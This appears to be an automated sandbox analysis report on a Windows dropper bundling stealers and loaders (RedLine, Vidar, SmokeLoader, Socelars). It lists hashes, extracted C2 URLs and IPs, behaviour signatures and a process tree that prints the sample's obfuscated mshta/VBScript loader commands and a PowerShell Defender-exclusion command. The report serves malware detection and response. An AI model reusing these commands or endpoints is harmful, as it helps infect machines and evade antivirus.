Analysis
-
max time kernel
29s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 22:51
Static task
static1
Behavioral task
behavioral1
Sample
a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
-
Size
4.2MB
-
MD5
a8d5b4fa270a49cc070fcf42ab106ea6
-
SHA1
8ad8be3abdcc2c9fe315a8a72a5f26a3454b9abe
-
SHA256
5d7d978a1e749fa8208f5e159d94d283845a1850799afe80aeec4163eb063af1
-
SHA512
8feae0f3ae36d79683248e86c97fa03c383f5d715f9f7fecf55e5576b9c6fdddb5b6ebbfe836e48ed4e1eb641b679466e3418712998f4d1835d7deb10f839fd9
-
SSDEEP
98304:JgFGhIlJg12cL46XQjaIT8y+iAE+OqUgQ47jmhb:J0fJg1BcjXXxB+OqLb7+b
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
smokeloader
pub5
Extracted
gcleaner
ggg-cl.biz
45.9.20.13
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
nullmixer
http://hsiens.xyz/
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
media214
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023267-87.dat family_fabookie -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/5052-244-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/5052-244-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 1 IoCs
resource yara_rule behavioral2/files/0x000700000002326e-79.dat family_socelars -
OnlyLogger payload 3 IoCs
resource yara_rule behavioral2/memory/4032-111-0x0000000000400000-0x0000000000883000-memory.dmp family_onlylogger behavioral2/memory/4032-115-0x00000000024D0000-0x0000000002518000-memory.dmp family_onlylogger behavioral2/memory/4032-233-0x0000000000400000-0x0000000000883000-memory.dmp family_onlylogger -
Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/4592-113-0x0000000002540000-0x0000000002616000-memory.dmp family_vidar behavioral2/memory/4592-114-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar behavioral2/memory/4592-159-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar -
Blocklisted process makes network request 5 IoCs
flow pid Process 18 972 Thu10c488b371805e.exe 24 972 Thu10c488b371805e.exe 27 972 Thu10c488b371805e.exe 42 972 Thu10c488b371805e.exe 45 972 Thu10c488b371805e.exe -
resource yara_rule behavioral2/files/0x0004000000022d20-57.dat aspack_v212_v242 behavioral2/files/0x0003000000022d25-55.dat aspack_v212_v242 behavioral2/files/0x0010000000023259-59.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Thu10e4c72be5623a40.exe -
Executes dropped EXE 12 IoCs
pid Process 3620 setup_installer.exe 3216 setup_install.exe 3860 Thu1009c5af81.exe 3528 Thu1059c186da67d4.exe 4556 Thu108c22e0002.exe 4360 Thu10ab306459a77.exe 4032 Thu105ed9e6198dd191.exe 2392 Thu10fbc9c6f3.exe 4592 Thu1071035b3cb.exe 4156 Thu105dc00580c8df.exe 972 Thu10c488b371805e.exe 872 Thu10e4c72be5623a40.exe -
Loads dropped DLL 7 IoCs
pid Process 3216 setup_install.exe 3216 setup_install.exe 3216 setup_install.exe 3216 setup_install.exe 3216 setup_install.exe 3216 setup_install.exe 3216 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 32 iplogger.org 33 iplogger.org 40 iplogger.org 42 iplogger.org 99 pastebin.com 100 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
pid pid_target Process procid_target 4176 3216 WerFault.exe 97 4860 4592 WerFault.exe 118 4000 4032 WerFault.exe 112 2928 4032 WerFault.exe 112 3076 4032 WerFault.exe 112 2344 4032 WerFault.exe 112 3372 4032 WerFault.exe 112 3556 4032 WerFault.exe 112 4044 4032 WerFault.exe 112 4540 4032 WerFault.exe 112 2372 4032 WerFault.exe 112 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe -
Kills process with taskkill 2 IoCs
pid Process 2460 taskkill.exe 3068 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3528 Thu1059c186da67d4.exe 3528 Thu1059c186da67d4.exe 2124 powershell.exe 2124 powershell.exe 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found 3376 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3528 Thu1059c186da67d4.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeCreateTokenPrivilege 972 Thu10c488b371805e.exe Token: SeAssignPrimaryTokenPrivilege 972 Thu10c488b371805e.exe Token: SeLockMemoryPrivilege 972 Thu10c488b371805e.exe Token: SeIncreaseQuotaPrivilege 972 Thu10c488b371805e.exe Token: SeMachineAccountPrivilege 972 Thu10c488b371805e.exe Token: SeTcbPrivilege 972 Thu10c488b371805e.exe Token: SeSecurityPrivilege 972 Thu10c488b371805e.exe Token: SeTakeOwnershipPrivilege 972 Thu10c488b371805e.exe Token: SeLoadDriverPrivilege 972 Thu10c488b371805e.exe Token: SeSystemProfilePrivilege 972 Thu10c488b371805e.exe Token: SeSystemtimePrivilege 972 Thu10c488b371805e.exe Token: SeProfSingleProcessPrivilege 972 Thu10c488b371805e.exe Token: SeIncBasePriorityPrivilege 972 Thu10c488b371805e.exe Token: SeCreatePagefilePrivilege 972 Thu10c488b371805e.exe Token: SeCreatePermanentPrivilege 972 Thu10c488b371805e.exe Token: SeBackupPrivilege 972 Thu10c488b371805e.exe Token: SeRestorePrivilege 972 Thu10c488b371805e.exe Token: SeShutdownPrivilege 972 Thu10c488b371805e.exe Token: SeDebugPrivilege 972 Thu10c488b371805e.exe Token: SeAuditPrivilege 972 Thu10c488b371805e.exe Token: SeSystemEnvironmentPrivilege 972 Thu10c488b371805e.exe Token: SeChangeNotifyPrivilege 972 Thu10c488b371805e.exe Token: SeRemoteShutdownPrivilege 972 Thu10c488b371805e.exe Token: SeUndockPrivilege 972 Thu10c488b371805e.exe Token: SeSyncAgentPrivilege 972 Thu10c488b371805e.exe Token: SeEnableDelegationPrivilege 972 Thu10c488b371805e.exe Token: SeManageVolumePrivilege 972 Thu10c488b371805e.exe Token: SeImpersonatePrivilege 972 Thu10c488b371805e.exe Token: SeCreateGlobalPrivilege 972 Thu10c488b371805e.exe Token: 31 972 Thu10c488b371805e.exe Token: 32 972 Thu10c488b371805e.exe Token: 33 972 Thu10c488b371805e.exe Token: 34 972 Thu10c488b371805e.exe Token: 35 972 Thu10c488b371805e.exe Token: SeDebugPrivilege 4556 Thu108c22e0002.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeShutdownPrivilege 3376 Process not Found Token: SeCreatePagefilePrivilege 3376 Process not Found Token: SeShutdownPrivilege 3376 Process not Found Token: SeCreatePagefilePrivilege 3376 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4628 wrote to memory of 3620 4628 a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe 96 PID 4628 wrote to memory of 3620 4628 a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe 96 PID 4628 wrote to memory of 3620 4628 a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe 96 PID 3620 wrote to memory of 3216 3620 setup_installer.exe 97 PID 3620 wrote to memory of 3216 3620 setup_installer.exe 97 PID 3620 wrote to memory of 3216 3620 setup_installer.exe 97 PID 3216 wrote to memory of 1632 3216 setup_install.exe 100 PID 3216 wrote to memory of 1632 3216 setup_install.exe 100 PID 3216 wrote to memory of 1632 3216 setup_install.exe 100 PID 3216 wrote to memory of 3004 3216 setup_install.exe 101 PID 3216 wrote to memory of 3004 3216 setup_install.exe 101 PID 3216 wrote to memory of 3004 3216 setup_install.exe 101 PID 3216 wrote to memory of 2452 3216 setup_install.exe 102 PID 3216 wrote to memory of 2452 3216 setup_install.exe 102 PID 3216 wrote to memory of 2452 3216 setup_install.exe 102 PID 3216 wrote to memory of 2192 3216 setup_install.exe 103 PID 3216 wrote to memory of 2192 3216 setup_install.exe 103 PID 3216 wrote to memory of 2192 3216 setup_install.exe 103 PID 3216 wrote to memory of 4512 3216 setup_install.exe 104 PID 3216 wrote to memory of 4512 3216 setup_install.exe 104 PID 3216 wrote to memory of 4512 3216 setup_install.exe 104 PID 3216 wrote to memory of 4056 3216 setup_install.exe 105 PID 3216 wrote to memory of 4056 3216 setup_install.exe 105 PID 3216 wrote to memory of 4056 3216 setup_install.exe 105 PID 3216 wrote to memory of 1700 3216 setup_install.exe 106 PID 3216 wrote to memory of 1700 3216 setup_install.exe 106 PID 3216 wrote to memory of 1700 3216 setup_install.exe 106 PID 3216 wrote to memory of 4644 3216 setup_install.exe 107 PID 3216 wrote to memory of 4644 3216 setup_install.exe 107 PID 3216 wrote to memory of 4644 3216 setup_install.exe 107 PID 3216 wrote to memory of 4228 3216 setup_install.exe 108 PID 3216 wrote to memory of 4228 3216 setup_install.exe 108 PID 3216 wrote to memory of 4228 3216 setup_install.exe 108 PID 3216 wrote to memory of 2304 3216 setup_install.exe 109 PID 3216 wrote to memory of 2304 3216 setup_install.exe 109 PID 3216 wrote to memory of 2304 3216 setup_install.exe 109 PID 3216 wrote to memory of 1932 3216 setup_install.exe 177 PID 3216 wrote to memory of 1932 3216 setup_install.exe 177 PID 3216 wrote to memory of 1932 3216 setup_install.exe 177 PID 3004 wrote to memory of 3860 3004 cmd.exe 111 PID 3004 wrote to memory of 3860 3004 cmd.exe 111 PID 2452 wrote to memory of 4032 2452 cmd.exe 112 PID 2452 wrote to memory of 4032 2452 cmd.exe 112 PID 2452 wrote to memory of 4032 2452 cmd.exe 112 PID 1932 wrote to memory of 3528 1932 cmd.exe 113 PID 1932 wrote to memory of 3528 1932 cmd.exe 113 PID 1932 wrote to memory of 3528 1932 cmd.exe 113 PID 4512 wrote to memory of 4556 4512 cmd.exe 114 PID 4512 wrote to memory of 4556 4512 cmd.exe 114 PID 4644 wrote to memory of 4360 4644 cmd.exe 115 PID 4644 wrote to memory of 4360 4644 cmd.exe 115 PID 4644 wrote to memory of 4360 4644 cmd.exe 115 PID 4056 wrote to memory of 2392 4056 cmd.exe 116 PID 4056 wrote to memory of 2392 4056 cmd.exe 116 PID 4056 wrote to memory of 2392 4056 cmd.exe 116 PID 2304 wrote to memory of 4592 2304 cmd.exe 118 PID 2304 wrote to memory of 4592 2304 cmd.exe 118 PID 2304 wrote to memory of 4592 2304 cmd.exe 118 PID 1700 wrote to memory of 4156 1700 cmd.exe 119 PID 1700 wrote to memory of 4156 1700 cmd.exe 119 PID 1700 wrote to memory of 4156 1700 cmd.exe 119 PID 2192 wrote to memory of 972 2192 cmd.exe 164 PID 2192 wrote to memory of 972 2192 cmd.exe 164 PID 2192 wrote to memory of 972 2192 cmd.exe 164
Processes
-
C:\Users\Admin\AppData\Local\Temp\a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1009c5af81.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1009c5af81.exeThu1009c5af81.exe5⤵
- Executes dropped EXE
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu105ed9e6198dd191.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu105ed9e6198dd191.exeThu105ed9e6198dd191.exe /mixone5⤵
- Executes dropped EXE
PID:4032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 6206⤵
- Program crash
PID:4000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 6566⤵
- Program crash
PID:2928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 7566⤵
- Program crash
PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 8006⤵
- Program crash
PID:2344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 6646⤵
- Program crash
PID:3372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 8246⤵
- Program crash
PID:3556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 10686⤵
- Program crash
PID:4044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 11206⤵
- Program crash
PID:4540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 12966⤵
- Program crash
PID:2372
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu10c488b371805e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10c488b371805e.exeThu10c488b371805e.exe5⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu108c22e0002.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu108c22e0002.exeThu108c22e0002.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu10fbc9c6f3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10fbc9c6f3.exeThu10fbc9c6f3.exe5⤵
- Executes dropped EXE
PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu105dc00580c8df.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu105dc00580c8df.exeThu105dc00580c8df.exe5⤵
- Executes dropped EXE
PID:4156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu10ab306459a77.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeThu10ab306459a77.exe5⤵
- Executes dropped EXE
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeC:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe6⤵PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeC:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe6⤵PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeC:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe6⤵PID:1848
-
-
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeC:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe6⤵PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exeC:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe6⤵PID:5052
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu10e4c72be5623a40.exe4⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exeThu10e4c72be5623a40.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:872 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:2436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe") do taskkill /F -Im "%~NxU"7⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:4772
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:4112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:5104
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:1612
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:3900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:3856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2612
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:4576
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:4052
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:1168
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵PID:972
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu10e4c72be5623a40.exe"8⤵
- Kills process with taskkill
PID:3068
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1071035b3cb.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1071035b3cb.exeThu1071035b3cb.exe5⤵
- Executes dropped EXE
PID:4592 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 10286⤵
- Program crash
PID:4860
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1059c186da67d4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1059c186da67d4.exeThu1059c186da67d4.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3528
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 5844⤵
- Program crash
PID:4176
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3216 -ip 32161⤵PID:2920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4592 -ip 45921⤵PID:5004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4032 -ip 40321⤵PID:2260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4032 -ip 40321⤵PID:3292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4032 -ip 40321⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4032 -ip 40321⤵PID:1952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4032 -ip 40321⤵PID:4000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 40321⤵PID:5004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4032 -ip 40321⤵PID:3900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4032 -ip 40321⤵PID:3644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4032 -ip 40321⤵PID:2972
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1344 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:81⤵PID:3308
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
700B
MD5e5352797047ad2c91b83e933b24fbc4f
SHA19bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827
-
Filesize
474KB
MD54bf3493517977a637789c23464a58e06
SHA1519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA5124d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501
-
Filesize
126KB
MD56c83f0423cd52d999b9ad47b78ba0c6a
SHA11f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA2564d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec
-
Filesize
1.4MB
MD54a01f3a6efccd47150a97d7490fd8628
SHA1284af830ac0e558607a6a34cf6e4f6edc263aee1
SHA256e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97
SHA5124d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519
-
Filesize
234KB
MD5c1778eeb18deadec6c4c72d97adbf91c
SHA19eac9677278acc3a85e70bd8077dff2519afd126
SHA2568c3063bb4864e1afa83c66635137cf06cd662b0a34735da4e2536092caeaa85e
SHA51224c85ea9226ce490b341c0926feac9cf7cfcb82d85b4c0b3b3fe4ce54bbabcafdc08ef80221f066780dd85787cf8e15806a43228478c28ae1628afaa2102f151
-
Filesize
440KB
MD5118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
Filesize
332KB
MD5043156651ac4912a8ceab1f202b6aa1a
SHA1303a75c18efee001d1530b4e182b7707b1dad2e1
SHA2564d183683cafefa0dc3cc6b4c550f600c233218a6d8e5ddd9d17b75c2429d6067
